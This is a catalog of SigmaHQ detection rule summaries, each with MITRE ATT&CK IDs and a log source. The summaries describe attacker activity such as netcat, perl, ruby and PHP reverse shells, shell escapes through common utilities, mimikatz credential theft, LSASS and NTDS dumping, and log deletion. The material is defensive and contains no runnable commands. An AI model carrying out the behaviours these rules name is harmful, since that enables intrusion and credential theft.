T1567T1572
imNetworkSession

Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
T1059
imProcessCreate

Detects the use of the "capsh" utility to invoke a shell.

SigmaHQ source
T1059
imProcessCreate

Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1059
imProcessCreate

Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro

SigmaHQ source
T1059
imProcessCreate

Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.

SigmaHQ source
T1059
imProcessCreate

Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate pri

SigmaHQ source
T1083
imProcessCreate

Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro

SigmaHQ source
T1059
imProcessCreate

Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1003
imFileEvent

Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.

SigmaHQ source
T1552.006
imFileEvent

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

SigmaHQ source
T1555.004
imFileEvent

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" fun

SigmaHQ source
T1555.004
imFileEvent

Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::m

SigmaHQ source
T1003
imFileEvent

Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi

SigmaHQ source
T1528
imFileEvent

Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "DbgModel.dll"

SigmaHQ source
T1219.002
imFileEvent

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target

SigmaHQ source
T1218
imNetworkSession

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually i

SigmaHQ source
T1102T1102.001
imNetworkSession

Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.

backdoor
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "MpSvc.dll".

SigmaHQ source
imFileEvent

Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensit

SigmaHQ source
T1562.001
imRegistry

Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker t

SigmaHQ source
T1003.001
imFileEvent

Detects file creation events with filename patterns used by CrackMapExec.

SigmaHQ source
T1219.002
imFileEvent

Detects the presence and execution of Inveigh via dropped artefacts

SigmaHQ source
T1558
imFileEvent

Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.

SigmaHQ source
imFileEvent

Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file

SigmaHQ source
T1003
imFileEvent

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

SigmaHQ source
T1574.001
imFileEvent

Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies o

SigmaHQ source
T1003.002
imFileEvent

Detects a dump file written by QuarksPwDump password dumper

SigmaHQ source
T1219.002
imFileEvent

Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.

SigmaHQ source
T1003.001
imFileEvent

Detects default lsass dump filename generated by SafetyKatz.

SigmaHQ source
T1552.001
imFileEvent

Detects files written by the different tools that exploit HiveNightmare

SigmaHQ source
T1555T1552.004
imFileEvent

Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.

SigmaHQ source
T1036.005
imFileEvent

Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to

SigmaHQ source
T1572T1090T1102
imNetworkSession

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have

evasion
SigmaHQ source
T1572T1090T1102
imNetworkSession

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have

SigmaHQ source
T1041T1090.002
imNetworkSession

Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors

backdoor
SigmaHQ source
T1203
imNetworkSession

Detects network connections from the Equation Editor process "eqnedt32.exe".

SigmaHQ source
T1567.002
imNetworkSession

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.

SigmaHQ source
T1218.003
imNetworkSession

Detects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.

SigmaHQ source
T1105
imNetworkSession

Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.

SigmaHQ source
T1567T1572
imNetworkSession

Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
imFileEvent

Detects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware.

SigmaHQ source
T1571
imNetworkSession

Detects programs that connect to known malware callback ports based on threat intelligence reports.

SigmaHQ source
T1071.001
imNetworkSession

Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Win

backdoorinfostealer
SigmaHQ source
T1218.009
imNetworkSession

Detects "RegAsm.exe" initiating a network connection to public IP adresses

SigmaHQ source
T1046
imProcessCreate

Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker

Malware User Agent
sigma high
SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used by malware in proxy logs

SigmaHQ source
T1562.002
imFileEvent

Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or si

SigmaHQ source
T1016
imNetworkSession

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process

SigmaHQ source
T1572T1021.001
imNetworkSession

Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389

SigmaHQ source
T1078T1190T1133
imAuthentication

Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

SigmaHQ source
T1133
imProcessCreate

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom

APT User Agent
sigma high
SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used in APT malware in proxy logs

SigmaHQ source
T1071.001
imWebSession

Detects Baby Shark C2 Framework default communication patterns

SigmaHQ source
T1590
imWebSession

Detect the update check performed by Advanced IP/Port Scanner utilities.

SigmaHQ source
T1021.001
imNetworkSession

Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling tha

lateral-movement
SigmaHQ source
T1218
imFileEvent

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Att

SigmaHQ source
T1567T1568.002T1572T1090T1102
imNetworkSession

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communicatio

backdoor
SigmaHQ source
T1055
imNetworkSession

Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network co

cobalt-strike
SigmaHQ source
T1087
imNetworkSession

Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1496
imNetworkSession

Detects initiated network connections to crypto mining pools

SigmaHQ source
T1587.001
imFileEvent

Detects the creation of a file with an uncommon extension in an Office application startup folder

SigmaHQ source
T1564
imFileEvent

Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.

SigmaHQ source
imFileEvent

Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware

SigmaHQ source
T1547.009
imFileEvent

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework

SigmaHQ source
T1055.009
imProcessCreate

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

SigmaHQ source
T1486T1562.001
DeviceImageLoadEvents

Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them

SigmaHQ source
T1567.001T1572
imNetworkSession

Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
T1567T1572
imNetworkSession

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
T1562.001
imRegistry

Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to b

SigmaHQ source
T1105
imNetworkSession

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

SigmaHQ source
T1190
imWebSession

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

SigmaHQ source
imFileEvent

Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.

SigmaHQ source
imFileEvent

Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature

SigmaHQ source
T1546.013
imFileEvent

Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

SigmaHQ source
T1003.001
imFileEvent

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

SigmaHQ source
T1001.003
imFileEvent

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

SigmaHQ source
T1036.007
imFileEvent

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

SigmaHQ source
T1505.003
imFileEvent

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

SigmaHQ source
T1059.003
imFileEvent

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<usern

SigmaHQ source
T1564.004
imFileEvent

Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powers

SigmaHQ source
imFileEvent

Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments

SigmaHQ source
T1070
DeviceImageLoadEvents

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

SigmaHQ source
T1559.001T1218.010
imNetworkSession

Detects a network connection initiated by "Regsvr32.exe"

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects a remote DLL load event via "rundll32.exe".

SigmaHQ source
imFileEvent

Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can someti

SigmaHQ source
T1059.012T1098
imProcessCreate

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and Loc

SigmaHQ source
T1562.001T1562.003T1059.012
imProcessCreate

Detects changes to the ESXi syslog configuration via "esxcli"

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.

SigmaHQ source
T1059.012T1529
imProcessCreate

Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.

SigmaHQ source
T1190
imWebSession

Detects potential SQL injection attempts via GET requests in access logs.

SigmaHQ source
T1082
imProcessCreate

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

SigmaHQ source
T1082
imProcessCreate

Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery

SCR File Write Event
sigma medium
SigmaHQ source
T1218.011
imFileEvent

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

SigmaHQ source
T1136T1059.012
imProcessCreate

Detects user account creation on ESXi system via esxcli

SigmaHQ source
imFileEvent

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

SigmaHQ source
T1569.002
imFileEvent

Detects default CSExec service filename which indicates CSExec service installation and execution

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

SigmaHQ source
T1569.002
imFileEvent

Detects default RemCom service filename which indicates RemCom service installation and execution

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "AVKkid.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "EACore.dll"

SigmaHQ source
T1219.002
imProcessCreate

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directo

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "vivaldi_elf.dll"

SigmaHQ source
T1547.015
imFileEvent

Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "CCleanerDU.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "CCleanerReactivator.dll"

SigmaHQ source
T1059
DeviceImageLoadEvents

Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

SigmaHQ source
T1218
imFileEvent

Detects programs on a Windows system that should not write executables to disk

SigmaHQ source
T1218
imFileEvent

Detects programs on a Windows system that should not write scripts to disk

SigmaHQ source
T1137
imFileEvent

Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "appverifUI.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "ShellDispatch.dll"

SigmaHQ source
T1140
imProcessCreate

Detects suspicious process command line that uses base64 encoded input for execution with a shell

SigmaHQ source
imProcessCreate

Detects the creation of a new named pipe using the "mkfifo" utility

SigmaHQ source
imProcessCreate

Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "7za.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "edputil.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.

SigmaHQ source
T1007
imProcessCreate

Detects usage of crontab to list the tasks of the user

SigmaHQ source
T1105
imProcessCreate

Detects the use of wget to download content to a suspicious directory

SigmaHQ source
imProcessCreate

Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.

SigmaHQ source
T1082
imProcessCreate

Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"

SigmaHQ source
T1082
imProcessCreate

Detects the use of grep to discover specific files created by the GobRAT malware

SigmaHQ source
imFileEvent

Detects the creation of shell scripts under the "profile.d" path.

SigmaHQ source
imProcessCreate

Detects execution of shells from a parent process located in a temporary (/tmp) directory

SigmaHQ source
imProcessCreate

Detects execution of binaries located in potentially suspicious locations via "nohup"

SigmaHQ source
T1105
imFileEvent

Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus

SigmaHQ source
DeviceImageLoadEvents

Detects PowerShell core DLL being loaded by an Office Product

SigmaHQ source
T1565.001
imProcessCreate

Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.

SigmaHQ source
T1102T1567T1105
imNetworkSession

Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "wwlib.dll"

Telegram API Access
sigma medium
SigmaHQ source
T1071.001T1102.002
imWebSession

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

SigmaHQ source
T1071.001T1197
imWebSession

Detects Bitsadmin connections to domains with uncommon TLDs

SigmaHQ source
imFileEvent

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

LiveKD Driver Creation
sigma medium
SigmaHQ source
imFileEvent

Detects the creation of the LiveKD driver, which is used for live kernel debugging

SigmaHQ source
imFileEvent

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "chrome_frame_helper.dll"

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL side loading of DLLs that are part of the Wazuh security platform

SigmaHQ source
imFileEvent

Detects the creation of binaries in the WinSxS folder by non-system processes

SigmaHQ source
T1003.001
imFileEvent

Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory

SigmaHQ source
imFileEvent

Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legiti

SigmaHQ source
imFileEvent

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.

SigmaHQ source
imFileEvent

Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.

SigmaHQ source
T1567.002
imFileEvent

Detects Rclone config files being created

SigmaHQ source
T1036T1036.003
imFileEvent

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homo

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "SolidPDFCreator.dll"

NTDS.DIT Created
sigma low
SigmaHQ source
T1003.003
imFileEvent

Detects creation of a file named "ntds.dit" (Active Directory Database)

SigmaHQ source
T1003.003
imFileEvent

Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location

SigmaHQ source
T1068
imFileEvent

Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to

SigmaHQ source
T1068
imFileEvent

Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.

SigmaHQ source
T1059
imFileEvent

Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

SigmaHQ source
T1587.001
imFileEvent

Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.

SigmaHQ source
T1071.001
imWebSession

Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.

SigmaHQ source
T1071.001
imWebSession

Detects suspicious encoded User-Agent strings, as seen used by some malware.

SigmaHQ source
T1102
imNetworkSession

Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"

SigmaHQ source
T1567T1105
imProcessCreate

Detects a suspicious curl process start the adds a file to a web request

SigmaHQ source
T1059
imProcessCreate

Detects usage of "xterm" as a potential reverse shell tunnel

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD accou

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"

SigmaHQ source
imProcessCreate

Detects execution of the bash shell with the interactive flag "-i".

SigmaHQ source
T1059
imProcessCreate

Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.

SigmaHQ source
imProcessCreate

Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity

SigmaHQ source
imProcessCreate

Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often lever

SigmaHQ source
imProcessCreate

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects CLR DLL being loaded by an Office Product

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects any assembly DLL being loaded by an Office Product

SigmaHQ source
T1059
imFileEvent

Detects Windows shells and scripting applications that write files to suspicious folders

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of rcdll.dll

SigmaHQ source
T1070
imProcessCreate

Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

SigmaHQ source
T1047
imFileEvent

Detects the creation of the default output filename used by the wmiexec tool

SigmaHQ source
imFileEvent

Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild

SigmaHQ source
T1055
DeviceImageLoadEvents

Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.

SigmaHQ source
T1547.001
imFileEvent

Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities

SigmaHQ source
T1547.001
imFileEvent

Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files i

SigmaHQ source
T1136.002T1543.003T1570
imFileEvent

Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system

SigmaHQ source
T1218
imFileEvent

Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context

SigmaHQ source
imFileEvent

Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used

SigmaHQ source
T1566.001
imFileEvent

Detects the creation of a office macro file from a a suspicious process

SigmaHQ source
T1137.003
imFileEvent

Detects the creation of a new Outlook form which can contain malicious code

SigmaHQ source
T1546.003
DeviceImageLoadEvents

Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.

SigmaHQ source
T1202
DeviceImageLoadEvents

Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library

SigmaHQ source
T1218.003
DeviceImageLoadEvents

Detects cmstp loading "dll" or "ocx" files from suspicious locations

SigmaHQ source
T1027.004
imFileEvent

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can

SigmaHQ source
T1071
DeviceImageLoadEvents

Detects SILENTTRINITY stager dll loading activity

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL

SigmaHQ source
T1070
imFileEvent

Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence

Backup Files Deleted
sigma medium
SigmaHQ source
T1490
imFileEvent

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrup

SigmaHQ source
T1070
imFileEvent

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

SigmaHQ source
T1070
imFileEvent

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1070
imFileEvent

Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1133
imFileEvent

Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects any GAC DLL being loaded by an Office Product

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.

SigmaHQ source
imFileEvent

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

SigmaHQ source
T1137T1008T1546
imFileEvent

Detects the creation of a macro file for Outlook.

SigmaHQ source
T1137.006
imFileEvent

Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).

SigmaHQ source
imFileEvent

Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents

SigmaHQ source
T1137T1008T1546
imFileEvent

Detects the creation of a macro file for Outlook.

SigmaHQ source
T1552.001
imProcessCreate

Detects when the file "passwd" or "shadow" is copied from tmp path

SigmaHQ source
imProcessCreate

Detects common command used to enable bpf kprobes tracing

SigmaHQ source
T1190
imWebSession

Detects possible Java payloads in web access logs

SigmaHQ source
T1071.001T1102.001T1102.003
imWebSession

Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form

SigmaHQ source
T1562.004
imProcessCreate

Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic

SigmaHQ source
T1562.004
imProcessCreate

Detects attempts to force stop the ufw using ufw-init

SigmaHQ source
T1049
imProcessCreate

Detects usage of system utilities to discover system network connections

